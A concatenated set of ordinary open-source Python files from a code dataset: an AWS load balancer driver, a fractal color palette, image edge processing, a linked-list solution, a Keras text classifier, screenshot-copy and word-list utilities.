'ip' attribute is ignored.\n :type members: ``list`` of :class:`Member`\n\n :return: True on success, False if no members provided.\n :rtype: ``bool``\n \"\"\"\n\n members = members or []\n\n # mandatory params\n params = {\"Action\": \"RegisterTargets\", \"TargetGroupArn\": target_group.id}\n\n if not members:\n return False\n\n idx = 0\n for member in members:\n idx += 1\n params[\"Targets.member.\" + str(idx) + \".Id\"] = member.id\n if member.port:\n params[\"Targets.member.\" + str(idx) + \".Port\"] = member.port\n\n # RegisterTargets doesn't return any useful data\n self.connection.request(ROOT, params=params)\n\n target_group.members = members\n\n return True\n\n def ex_create_listener(\n self,\n balancer,\n port,\n proto,\n target_group,\n action=\"forward\",\n ssl_cert_arn=None,\n ssl_policy=None,\n ):\n \"\"\"\n Create a listener for application load balancer\n\n :param balancer: LoadBalancer to create listener for\n :type balancer: :class:`LoadBalancer`\n\n :param port: Port number to setup load balancer listener\n :type port: ``int``\n\n :param proto: Load balancer protocol, should be 'HTTP' or 'HTTPS'.\n :type proto: ``str``\n\n :param target_group: Target group associated with the listener.\n :type target_group: :class:`ALBTargetGroup`\n\n :param action: Default action for the listener,\n valid value is 'forward'\n :type action: ``str``\n\n :param ssl_cert_arn: SSL certificate ARN to use when listener protocol\n is 'HTTPS'.\n :type ssl_cert_arn: ``str``\n\n :param ssl_policy: The security policy that defines which ciphers and\n protocols are supported. The default is the current\n predefined security policy.\n Example: 'ELBSecurityPolicy-2016-08'\n :type ssl_policy: ``str``\n\n :return: Listener object\n :rtype: :class:`ALBListener`\n \"\"\"\n\n ssl_cert_arn = ssl_cert_arn or \"\"\n ssl_policy = ssl_policy or \"\"\n\n # mandatory params\n params = {\n \"Action\": \"CreateListener\",\n \"LoadBalancerArn\": balancer.id,\n \"Protocol\": proto, # Valid Values: HTTP | HTTPS\n \"Port\": port, # Valid Range: Min value of 1. Max value of 65535.\n \"DefaultActions.member.1.Type\": action,\n \"DefaultActions.member.1.TargetGroupArn\": target_group.id,\n }\n\n # optional params\n if proto == \"HTTPS\":\n params[\"Certificates.member.1.CertificateArn\"] = ssl_cert_arn\n if ssl_policy:\n params[\"SslPolicy\"] = ssl_policy\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateListenerResult/Listeners/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n listener = self._to_listener(el)\n listener.balancer = balancer\n\n return listener\n\n def ex_create_listener_rule(\n self,\n listener,\n priority,\n target_group,\n action=\"forward\",\n condition_field=None,\n condition_value=None,\n ):\n \"\"\"\n Create a rule for listener.\n\n :param listener: Listener object where to create rule\n :type listener: :class:`ALBListener`\n\n :param priority: The priority for the rule. A listener can't have\n multiple rules with the same priority.\n :type priority: ``str``\n\n :param target_group: Target group object to associate with rule\n :type target_group: :class:`ALBTargetGroup`\n\n :param action: Action for the rule, valid value is 'forward'\n :type action: ``str``\n\n :param condition_field: Rule condition field name. The possible values\n are 'host-header' and 'path-pattern'.\n :type condition_field: ``str``\n\n :param condition_value: Value to match. 
Wildcards are supported, for\n example: '/img/*'\n\n :return: Rule object\n :rtype: :class:`ALBRule`\n \"\"\"\n\n condition_field = condition_field or \"\"\n condition_value = condition_value or \"\"\n\n # mandatory params\n params = {\n \"Action\": \"CreateRule\",\n \"ListenerArn\": listener.id,\n \"Priority\": priority, # Valid Range: Min value of 1. Max: 99999.\n \"Actions.member.1.Type\": action,\n \"Actions.member.1.TargetGroupArn\": target_group.id,\n # Valid values are host-header and path-pattern.\n \"Conditions.member.1.Field\": condition_field,\n \"Conditions.member.1.Values.member.1\": condition_value,\n }\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateRuleResult/Rules/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n rule = self._to_rule(el)\n rule.listener = listener\n\n return rule\n\n def ex_get_target_group(self, target_group_id):\n \"\"\"\n Get target group object by ARN\n\n :param target_group_id: ARN of target group\n :type target_group_id: ``str``\n\n :return: Target group object\n :rtype: :class:`ALBTargetGroup`\n \"\"\"\n\n # mandatory params\n params = {\n \"Action\": \"DescribeTargetGroups\",\n \"TargetGroupArns.member.1\": target_group_id,\n }\n\n data = self.connection.request(ROOT, params=params).object\n\n return self._to_target_groups(data)[0]\n\n def ex_get_listener(self, listener_id):\n \"\"\"\n Get listener object by ARN\n\n :param listener_id: ARN of listener object to get\n :type listener_id: ``str``\n\n :return: Listener object\n :rtype: :class:`ALBListener`\n \"\"\"\n\n # mandatory params\n params = {\"Action\": \"DescribeListeners\", \"ListenerArns.member.1\": listener_id}\n\n data = self.connection.request(ROOT, params=params).object\n return self._to_listeners(data)[0]\n\n def ex_get_rule(self, rule_id):\n \"\"\"\n Get rule by ARN.\n\n :param rule_id: ARN of rule\n :type rule_id: ``str``\n\n :return: Rule object\n :rtype: :class:`ALBRule`\n \"\"\"\n\n params = {\"Action\": \"DescribeRules\", \"RuleArns.member.1\": rule_id}\n\n data = self.connection.request(ROOT, params=params).object\n return self._to_rules(data)[0]\n\n def _to_listeners(self, data):\n xpath = \"DescribeListenersResult/Listeners/member\"\n return [self._to_listener(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_listener(self, el):\n listener = ALBListener(\n listener_id=findtext(element=el, xpath=\"ListenerArn\", namespace=NS),\n protocol=findtext(element=el, xpath=\"Protocol\", namespace=NS),\n port=int(findtext(element=el, xpath=\"Port\", namespace=NS)),\n balancer=None,\n driver=self.connection.driver,\n action=findtext(element=el, xpath=\"DefaultActions/member/Type\", namespace=NS),\n ssl_policy=findtext(element=el, xpath=\"SslPolicy\", namespace=NS),\n ssl_certificate=findtext(\n element=el, xpath=\"Certificates/member/CertificateArn\", namespace=NS\n ),\n )\n\n listener._balancer_arn = findtext(element=el, xpath=\"LoadBalancerArn\", namespace=NS)\n\n return listener\n\n def _to_balancer(self, el):\n balancer = LoadBalancer(\n id=findtext(element=el, xpath=\"LoadBalancerArn\", namespace=NS),\n name=findtext(element=el, xpath=\"LoadBalancerName\", namespace=NS),\n state=State.UNKNOWN,\n ip=findtext(el, xpath=\"DNSName\", namespace=NS),\n port=None,\n driver=self.connection.driver,\n )\n\n balancer.extra = {\n \"listeners\": self._ex_get_balancer_listeners(balancer),\n \"tags\": self._ex_get_balancer_tags(balancer),\n \"vpc\": findtext(el, xpath=\"VpcId\", namespace=NS),\n }\n\n if 
len(balancer.extra[\"listeners\"]) > 0:\n balancer.port = balancer.extra[\"listeners\"][0].port\n else:\n balancer.port = None\n\n return balancer\n\n def _to_balancers(self, data):\n xpath = \"DescribeLoadBalancersResult/LoadBalancers/member\"\n return [self._to_balancer(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_tags(self, data):\n \"\"\"\n return tags dict\n \"\"\"\n tags = {}\n xpath = \"DescribeTagsResult/TagDescriptions/member/Tags/member\"\n\n for el in findall(element=data, xpath=xpath, namespace=NS):\n key = findtext(element=el, xpath=\"Key\", namespace=NS)\n value = findtext(element=el, xpath=\"Value\", namespace=NS)\n if key:\n tags[key] = value\n\n return tags\n\n def _to_rule(self, el):\n def __to_bool__(val):\n return val.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n conditions = {}\n cond_members = findall(element=el, xpath=\"Conditions/member\", namespace=NS)\n for cond_member in cond_members:\n field = findtext(element=cond_member, xpath=\"Field\", namespace=NS)\n conditions[field] = []\n value_members = findall(element=cond_member, xpath=\"Values/member\", namespace=NS)\n for value_member in value_members:\n conditions[field].append(value_member.text)\n\n rule = ALBRule(\n rule_id=findtext(element=el, xpath=\"RuleArn\", namespace=NS),\n is_default=__to_bool__(findtext(element=el, xpath=\"IsDefault\", namespace=NS)),\n # CreateRule API method accepts only int for priority, however\n # DescribeRules method returns 'default' string for default\n # listener rule. So leaving it as string.\n priority=findtext(element=el, xpath=\"Priority\", namespace=NS),\n target_group=None,\n driver=self.connection.driver,\n conditions=conditions,\n )\n\n rule._target_group_arn = findtext(\n element=el, xpath=\"Actions/member/TargetGroupArn\", namespace=NS\n )\n\n return rule\n\n def _to_rules(self, data):\n xpath = \"DescribeRulesResult/Rules/member\"\n return [self._to_rule(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_target_groups(self, data):\n xpath = \"DescribeTargetGroupsResult/TargetGroups/member\"\n return [\n self._to_target_group(el) for el in findall(element=data, xpath=xpath, namespace=NS)\n ]\n\n def _to_target_group(self, el):\n target_group = ALBTargetGroup(\n target_group_id=findtext(element=el, xpath=\"TargetGroupArn\", namespace=NS),\n name=findtext(element=el, xpath=\"TargetGroupName\", namespace=NS),\n protocol=findtext(element=el, xpath=\"Protocol\", namespace=NS),\n port=int(findtext(element=el, xpath=\"Port\", namespace=NS)),\n vpc=findtext(element=el, xpath=\"VpcId\", namespace=NS),\n driver=self.connection.driver,\n health_check_timeout=int(\n findtext(element=el, xpath=\"HealthCheckTimeoutSeconds\", namespace=NS)\n ),\n health_check_port=findtext(element=el, xpath=\"HealthCheckPort\", namespace=NS),\n health_check_path=findtext(element=el, xpath=\"HealthCheckPath\", namespace=NS),\n health_check_proto=findtext(element=el, xpath=\"HealthCheckProtocol\", namespace=NS),\n health_check_interval=int(\n findtext(element=el, xpath=\"HealthCheckIntervalSeconds\", namespace=NS)\n ),\n healthy_threshold=int(\n findtext(element=el, xpath=\"HealthyThresholdCount\", namespace=NS)\n ),\n unhealthy_threshold=int(\n findtext(element=el, xpath=\"UnhealthyThresholdCount\", namespace=NS)\n ),\n health_check_matcher=findtext(element=el, xpath=\"Matcher/HttpCode\", namespace=NS),\n )\n\n lbs = findall(element=el, xpath=\"LoadBalancerArns/member\", namespace=NS)\n target_group._balancers_arns = [lb_arn.text for lb_arn in 
lbs]\n\n return target_group\n\n def _to_target_group_members(self, data):\n xpath = \"DescribeTargetHealthResult/TargetHealthDescriptions/member\"\n return [\n self._to_target_group_member(el)\n for el in findall(element=data, xpath=xpath, namespace=NS)\n ]\n\n def _to_target_group_member(self, el):\n member = Member(\n id=findtext(element=el, xpath=\"Target/Id\", namespace=NS),\n ip=None,\n port=findtext(element=el, xpath=\"Target/Port\", namespace=NS),\n balancer=None,\n extra={\"health\": findtext(element=el, xpath=\"TargetHealth/State\", namespace=NS)},\n )\n return member\n\n def _ex_get_target_group_members(self, target_group):\n \"\"\"\n Return a list of target group member dicts.\n\n :param target_group: target group to fetch members for\n :type target_group: :class:`ALBTargetGroup`\n\n :return: list of target group members\n :rtype: ``list`` of :class:`Member`\n \"\"\"\n\n params = {\"Action\": \"DescribeTargetHealth\", \"TargetGroupArn\": target_group.id}\n\n data = self.connection.request(ROOT, params=params).object\n target_group_members = []\n for tg_member in self._to_target_group_members(data):\n tg_member.extra[\"target_group\"] = target_group\n target_group_members.append(tg_member)\n\n return target_group_members\n\n def _ex_get_balancer_listeners(self, balancer):\n \"\"\"\n Return a list of listeners associated with load balancer.\n\n :param balancer: Load balancer to fetch listeners for\n :type balancer: :class:`LoadBalancer`\n\n :return: list of listener objects\n :rtype: ``list`` of :class:`ALBListener`\n \"\"\"\n params = {\"Action\": \"DescribeListeners\", \"LoadBalancerArn\": balancer.id}\n\n data = self.connection.request(ROOT, params=params).object\n\n return self._to_listeners(data)\n\n def _ex_get_rules_for_listener(self, listener):\n \"\"\"\n Get list of rules associated with listener.\n\n :param listener: Listener object to fetch rules for\n :type listener: :class:`ALBListener`\n\n :return: List of rules\n :rtype: ``list`` of :class:`ALBListener`\n \"\"\"\n\n params = {\"Action\": \"DescribeRules\", \"ListenerArn\": listener.id}\n\n data = self.connection.request(ROOT, params=params).object\n rules = self._to_rules(data)\n for rule in rules:\n rule.listener = listener\n\n return rules\n\n def _ex_get_balancer_tags(self, balancer):\n \"\"\"\n Get a dict of load balancer tags.\n\n :param balancer: Load balancer to fetch tags for\n :type balancer: :class:`LoadBalancer`\n\n :return: Dictionary of tags (name/value) for load balancer\n :rtype: ``dict``\n \"\"\"\n params = {\"Action\": \"DescribeTags\", \"ResourceArns.member.1\": balancer.id}\n data = self.connection.request(ROOT, params=params).object\n return self._to_tags(data)\n\n def _ex_connection_class_kwargs(self):\n pdriver = super()\n kwargs = pdriver._ex_connection_class_kwargs()\n if hasattr(self, \"token\") and self.token is not None:\n kwargs[\"token\"] = self.token\n kwargs[\"signature_version\"] = \"4\"\n else:\n kwargs[\"signature_version\"] = self.signature_version\n\n return kwargs\n\n\n# Commented out to avoid confusion. In AWS ALB relation between load balancer\n# and target group/members is indirect. 
So it's better to go through full chain\n# to obtain required object(s).\n# Chain is: balancer->listener->rule->target group->member\n#\n# def balancer_list_members(self, balancer):\n# \"\"\"\n# List members of load balancer\n#\n# :param balancer: LoadBalancer to list members for\n# :type balancer: :class:`LoadBalancer`\n#\n# :rtype: ``list`` of :class:`Member`\n# \"\"\"\n# return balancer.extra.get('members', [])\n#\n# def _ex_get_balancer_members(self, balancer):\n# \"\"\"\n# Fetch members across all listeners/rules/target groups\n#\n# :param balancer: load balancer to fetch members for\n# :type balancer: :class:`LoadBalancer`\n#\n# :return: list of load balancer members across all target groups\n# :rtype: ``list`` of :class:`Member`\n# \"\"\"\n# balancer_members = []\n# for listener in balancer.extra.get('listeners', []):\n# for rule in listener.rules:\n# for tg_member in rule.target_group.members:\n# tg_member.balancer = balancer\n# tg_member.extra['target_group'] = rule.target_group\n# balancer_members.append(tg_member)\n#\n# return balancer_members\n#\n# def _ex_get_balancer_target_groups(self, balancer):\n# \"\"\"\n# Return a list of load balancer target groups.\n#\n# :param balancer: load balancer to fetch target groups for\n# :type balancer: :class:`LoadBalancer`\n#\n# :rtype: ``list`` of :class:`ALBTargetGroup`\n# \"\"\"\n# params = {\n# 'Action': 'DescribeTargetGroups',\n# 'LoadBalancerArn': balancer.id\n# }\n#\n# data = self.connection.request(ROOT, params=params).object\n#\n# return self._to_target_groups(data)\n","repo_name":"apache/libcloud","sub_path":"libcloud/loadbalancer/drivers/alb.py","file_name":"alb.py","file_ext":"py","file_size_in_byte":35648,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"3929111728","text":"# --\n# File: fractalpalette.py\n#\n# Logical for color palettes\n#\n# --\n\nfrom collections import defaultdict\n\nimport math\nimport numpy as np\n\ndef gaussian(x, mu, sig):\n return np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.)))\n\nclass FractalPalette:\n \"\"\"\n Color gradient\n \"\"\"\n\n # Color in RGB \n def __init__(self, context):\n self.context = context\n\n self.gradient_size = 1024\n self.palette = []\n\n self.hues = None\n self.histogram = None\n self.per_frame_reset()\n\n\n # called for each pixel\n def raw_calc_from_algo(self, m):\n if m < self.context.max_iter:\n self.histogram[math.floor(m)] += 1\n\n def calc_hues(self): \n #- \n # From histogram normalize to percent-of-total. This is\n # effectively a probability distribution of escape values \n #\n # Note that this is not effecitly a probability distribution for\n # a given escape value. 
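        # Worked illustration of the running sum computed below (numbers
        # invented): with histogram = {0: 10, 1: 30, 2: 60} and total = 100,
        # h accumulates to hues = [0.1, 0.4, 1.0] -- a cumulative
        # distribution, so every hue lands in [0, 1] whatever max_iter is.
        #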
We can use this to calculate the Shannon \n\n total = sum(self.histogram.values())\n h = 0\n\n for i in range(self.context.max_iter):\n if total :\n h += self.histogram[i] / total\n self.hues.append(h)\n self.hues.append(h)\n\n def per_frame_reset(self):\n self.hues = [] \n self.histogram = defaultdict(int) \n\n\n def map_value_to_color(self, m, smoothing=False):\n\n if len(self.palette) == 0: \n c = 255 - int(255 * self.hues[math.floor(m)]) \n return (c, c, c)\n \n if smoothing:\n c1 = self.palette[1024 - int(1024 * self.hues[math.floor(m)])]\n c2 = self.palette[1024 - int(1024 * self.hues[math.ceil(m)])]\n return linear_interpolate(c1,c2,.5) \n else:\n c = self.palette[1024 - int(1024 * self.hues[math.floor(m)])]\n return c \n\n\n def linear_interpolate(color1, color2, fraction):\n new_r = int(math.ceil((color2[0] - color1[0])*fraction) + color1[0])\n new_g = int(math.ceil((color2[1] - color1[1])*fraction) + color1[1])\n new_b = int(math.ceil((color2[2] - color1[2])*fraction) + color1[2])\n return (new_r, new_g, new_b)\n\n\n def create_gauss_gradient(self, c1, c2, mu=0.0, sigma=1.0): \n \n print(\"+ Creating color gradient with gaussian decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n self.palette.append(c2)\n\n x = 0.0\n while len(self.palette) <= self.gradient_size:\n g = gaussian(x,0,.10)\n c = FractalPalette.linear_interpolate(c1, c2, g) \n self.palette.append(c)\n x = x + (1./(self.gradient_size+1))\n\n def create_exp_gradient(self, c1, c2, decay_const = 1.01): \n\n print(\"+ Creating color gradient with exponential decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n\n x = 0.0\n\n while len(self.palette) <= self.gradient_size:\n fraction = math.pow(math.e,-15.*x)\n c = FractalPalette.linear_interpolate(c1, c2, fraction)\n self.palette.append(c)\n x = x + (1. / 1025) \n\n\n def create_exp2_gradient(self, c1, c2, decay_const = 1.01): \n\n print(\"+ Creating color gradient with varying exponential decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n\n x = 0.0\n c = c1\n # Do a very quick decent for the first 1/16 \n while len(self.palette) <= float(self.gradient_size)/32.:\n fraction = math.pow(math.e,-30.*x)\n c = FractalPalette.linear_interpolate((255,255,255), c1, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n x = 0.0\n # Do another quick decent back to first color for the next 1/16 \n while len(self.palette) <= 2.*(float(self.gradient_size) / 16.):\n fraction = math.pow(math.e,-15.*x)\n c = FractalPalette.linear_interpolate((255,255,255), last_c, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n x = 0.0\n # Do another quick decent back to first color for the next 1/16 \n while len(self.palette) <= 2.*(float(self.gradient_size) / 16.):\n fraction = math.pow(math.e,-5.*x)\n c = FractalPalette.linear_interpolate((255,255,255), last_c, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n # For the remaining go back to white \n x = 0.0\n while len(self.palette) <= self.gradient_size :\n fraction = math.pow(math.e,-2.*x)\n c = FractalPalette.linear_interpolate((255,255,255),last_c, fraction)\n self.palette.append(c)\n x = x + (1. 
/ float(self.gradient_size)) \n\n\n def create_normal_gradient(self, c1, c2, decay_const = 1.05): \n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n fraction = 1.\n while len(self.palette) <= self.gradient_size:\n c = FractalPalette.linear_interpolate(c1, c2, fraction)\n self.palette.append(c)\n fraction = fraction / decay_const\n \n\n # Create 255 value gradient\n # Use the following trivial linear interpolation algorithm\n # (color2 - color1) * fraction + color1\n def create_gradient_from_list(self, color_list = [(255,255,255),(0,0,0),(255,255,255),(0,0,0),(255,255,255),(0,0,0),(241, 247, 215),(255,204,204),(204,204,255),(255,255,204),(255,255,255)]):\n\n print(\"+ Creating color gradient from color list\")\n\n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n \n #the first few colors are critical, so just fill by hand.\n self.palette.append((0,0,0))\n self.palette.append((0,0,0))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.2))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.4))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.6))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.8))\n\n # The magic number 6 here just denotes the previous colors we\n # filled by hand\n section_size = int(float(self.gradient_size-6)/float(len(color_list)-1))\n\n for c in range(0, len(color_list) - 1): \n for i in range(0, section_size+1): \n fraction = float(i)/float(section_size)\n new_color = FractalPalette.linear_interpolate(color_list[c], color_list[c+1], fraction)\n self.palette.append(new_color)\n while len(self.palette) < self.gradient_size:\n c = self.palette[-1]\n self.palette.append(c)\n #assert len(self.palette) == self.gradient_size \n\n def make_frame(self, t): \n\n IMG_WIDTH=1024\n IMG_HEIGHT=100\n \n im = Image.new('RGB', (IMG_WIDTH, IMG_HEIGHT), (0, 0, 0))\n draw = ImageDraw.Draw(im)\n\n color_iter = 0\n for x in range(0,IMG_WIDTH):\n color = self.palette[color_iter]\n for y in range(0,IMG_HEIGHT):\n draw.point([x, y], color) \n color_iter += 1 \n \n\n return np.array(im)\n\n def __iter__(self):\n return self.palette\n\n def __getitem__(self, index):\n return self.palette[index]\n\n def display(self):\n clip = mpy.VideoClip(self.make_frame, duration=64)\n clip.preview(fps=1) #fps 1 is really all that works\n## FractalPalette \n","repo_name":"61cygni/mandl","sub_path":"fractalpalette.py","file_name":"fractalpalette.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72240282026","text":"from PIL import Image, ImageFilter\nimport os\nfrom glob import glob\nimport cv2\n\ninput_dir = \"images/Target\"\noutput_dir = \"images/GrayScale\"\n\ndef overlayEdges(edges, origin):\n background = transformFromCV2ToPillowImageFormat(origin)\n background.paste(edges, (0, 0), edges)\n background = background.convert(\"RGB\")\n return background\n\ndef transformFromCV2ToPillowImageFormat(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n return Image.fromarray(img)\n\ndef createEdgesOverlay(origin):\n edges = cv2.Canny(origin, 30, 300, 3)\n edges = cv2.dilate(edges, (3, 3))\n edges = cv2.bitwise_not(edges)\n edges = transformFromCV2ToPillowImageFormat(edges)\n makeWhiteBackgroundTransparent(edges)\n edges = edges.filter(ImageFilter.GaussianBlur) #do blurring here because doing it before making 
background transparent results in white halo\n\n return edges\n\ndef makeWhiteBackgroundTransparent(img):\n datas = img.getdata()\n newData = []\n for item in datas:\n if item[0] == 255 and item[1] == 255 and item[2] == 255:\n newData.append((255, 255, 255, 0))\n else:\n newData.append(item)\n img.putdata(newData)\n\n\ndef img_converter(img_path, output_path):\n origin = cv2.imread(img_path)\n\n edges = cv2.Canny(origin, 30, 300, 3)\n edges = cv2.dilate(edges, (3, 3))\n edges = cv2.bitwise_not(edges)\n edges = transformFromCV2ToPillowImageFormat(edges)\n makeWhiteBackgroundTransparent(edges)\n edges = edges.filter(ImageFilter.GaussianBlur)\n\n background = transformFromCV2ToPillowImageFormat(origin)\n background.paste(edges, (0, 0), edges)\n background = background.convert(\"RGB\")\n background.save(output_path)\n return\n\ndef process_images():\n pathes = glob(\"images/Target/*/*.jpg\")\n # out_path = source_dir.replace(\"Target\", \"GrayScale\")\n for path in pathes:\n out_path = path.replace(\"Target\", \"GrayScale\")\n img_converter(path, out_path)\n\nif __name__ == \"__main__\":\n process_images()","repo_name":"lukabarbakadze/AnimeGAN","sub_path":"scripts/image_to_grayscale.py","file_name":"image_to_grayscale.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12638436049","text":"# https://leetcode.com/problems/intersection-of-two-linked-lists/\n# 160. Intersection of Two Linked Lists\n# Easy\n# Linked List\n# A/B\n\n\nfrom typing import List\nfrom _listHelpers import *\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n if (not headA) or not headB:\n return None\n\n p1, p2 = headA, headB\n while p1 != p2:\n p1 = p1.next if p1 else headB\n p2 = p2.next if p2 else headA\n\n return p1\n\n\nclass SolutionHT:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n dic = {}\n if (not headA) or not headB:\n return None\n \n node = headA\n while node:\n dic[node] = 1\n node = node.next\n \n node = headB\n while node and node not in dic:\n node = node.next\n \n return node\n\nsolution = Solution()\n\nres = solution.getIntersectionNode(construct([4,1,8,4,5]), construct([5,6,1,8,4,5]))\nprintList(res)\n\n","repo_name":"segios/problems","sub_path":"python-problems/Linked List/160. Intersection of Two Linked Lists.py","file_name":"160. 
Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24165683230","text":"# -*- coding: utf-8 -*-\n# @Date : 2019/9/12\n# @Author : mingming.xu\n# @File : rcnn.py\n\n'''\nhttp://ir.ia.ac.cn/handle/173211/11477\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.layers import Dense, Input, Embedding, LSTM, concatenate, Lambda, Conv1D, GlobalMaxPool1D\nfrom keras.models import Model\n\n\nclass RCNN(object):\n def __init__(self, maxlen, max_feats, emb_dim, class_num=1, last_activation='sigmoid'):\n self.maxlen = maxlen\n self.max_feats = max_feats\n self.emb_dim = emb_dim\n self.class_num = class_num\n self.last_activation = last_activation\n\n def get_model(self):\n input_ = Input((self.maxlen, ))\n input_left = Input((self.maxlen, ))\n input_right = Input((self.maxlen, ))\n\n embedding = Embedding(input_dim=self.max_feats, output_dim=self.emb_dim, input_length=self.maxlen)\n emb_ = embedding(input_)\n emb_left = embedding(input_left)\n emb_right = embedding(input_right)\n\n enc_left = LSTM(128, activation='tanh', return_sequences=True)(emb_left)\n enc_right = LSTM(128, activation='tanh', go_backwards=True, return_sequences=True)(emb_right)\n enc_right = Lambda(lambda x: tf.reverse(x, axis=[1]))(enc_right)\n\n x = concatenate([enc_left, emb_, enc_right], axis=-1)\n\n x = Conv1D(32, kernel_size=1, activation='tanh')(x)\n x = GlobalMaxPool1D()(x)\n\n output = Dense(self.class_num, activation=self.last_activation)(x)\n model = Model(inputs=[input_, input_left, input_right], outputs=output)\n return model\n","repo_name":"xv44586/Papers","sub_path":"NLP/TextClassification/RCNN/rcnn.py","file_name":"rcnn.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36030780803","text":"import imp\n\n\nimport sys\nimport os\nsys.path.append(\"./backend\")\nfrom db import DB\nfrom configSys import config\nResult_DIR = config['result_dir']\nSRC = Result_DIR+'crawler/crawler_result'\ncluster_id_path = '/home/ch/Scan/6'\n\n\n\nif '__main__' == __name__:\n db = DB() \n rows = db.fetch(\"select crawler_id, target_url from fraud_crawler_sustainable where sus_flag = 4 and web_status_code = 200;\") \n if not os.path.exists(cluster_id_path):\n os.makedirs(cluster_id_path) \n for row in rows:\n id = row[0]\n url = row[1]\n src = f'{SRC}/{url}/screenshot.png'\n dst = f'{cluster_id_path}/\"{url}\".png'\n copy_cmd = f'cp {src} {dst}'\n os.system(copy_cmd)","repo_name":"Chengxiaosa/sus","sub_path":"backend/resources/sus_crawler/addFraudcase.py","file_name":"addFraudcase.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15814045448","text":"'''\nAsk for name as input and validate it's not less than or equal to 3 characters and not more than 12 characters\nusing logical operators\n'''\n\nname = input(\"Enter you name \")\nif (len(name) <= 3) or (len(name) >= 12):\n print(\"Name should be between 4 to 12 characters\")\nelse:\n print(\"you have a valid name\")","repo_name":"oldmonkandlinux/python-basics","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21400188221","text":"fileName = 'wordListBlizz'\n\n\nclass 
WordShelf(object):\n\n articles = []\n adjectives = []\n adverbs = []\n\n nouns = {\n 'singular': [],\n 'plural': []}\n\n names = {\n 'special': [],\n 'other': []}\n\n # VERBS:\n # [singular, plural]\n # [first, second, third]\n # [past, present, future]\n\n verbs = { # plurality\n 'singular': {},\n 'plural': {}}\n\n for plurality in verbs: # person\n\n verbs[plurality] = {\n 'first': {},\n 'second': {},\n 'third': {}}\n\n for plurality in verbs:\n for person in verbs[plurality]: # tense\n\n verbs[plurality][person] = {\n 'past': [],\n 'present': [],\n 'future': []}\n\n # argument should be the name of the file\n def __init__(self):\n\n self.wordList = [line for line in open(fileName)]\n\n # Put the words in the wordfile where they belong\n if not self.articles:\n self.articles = self.getArticles()\n if not self.adjectives:\n self.adjectives = self.getAdjectives()\n if not self.adverbs:\n self.addAdverbs()\n if not self.nouns['singular']: # if singular is not set,\n self.addNouns() # then plural wont be either\n if not self.names['other']:\n self.addNames()\n if not self.verbs['singular']['first']['past']: # same logic^\n self.verbs = self.getVerbs()\n\n def getArticles(self):\n\n articles = []\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ARTICLES\\n'),\n self.wordList.index('END\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n articles.append(words.strip().replace('_', ' '))\n\n return articles\n\n def getAdjectives(self):\n\n adjectives = []\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ADJECTIVES\\n'),\n self.wordList.index('ADVERBS\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n adjectives.append(words.strip().replace('_', ' '))\n\n return adjectives\n\n def addAdverbs(self):\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ADVERBS\\n'),\n self.wordList.index('NOUNS\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n self.adverbs.append(words.strip().replace('_', ' '))\n\n def addNouns(self):\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('NOUNS\\n'),\n self.wordList.index('VERBS\\n'))\n\n # separate nouns into words on left and words on right\n left, right = [], []\n\n # split words into list, then append to left/right\n for words in self.wordList[start+2: end]:\n words = words.split()\n left.append(words[0].replace('_', ' '))\n right.append(words[1].replace('_', ' '))\n\n # left are singular nouns, right are plural nouns\n 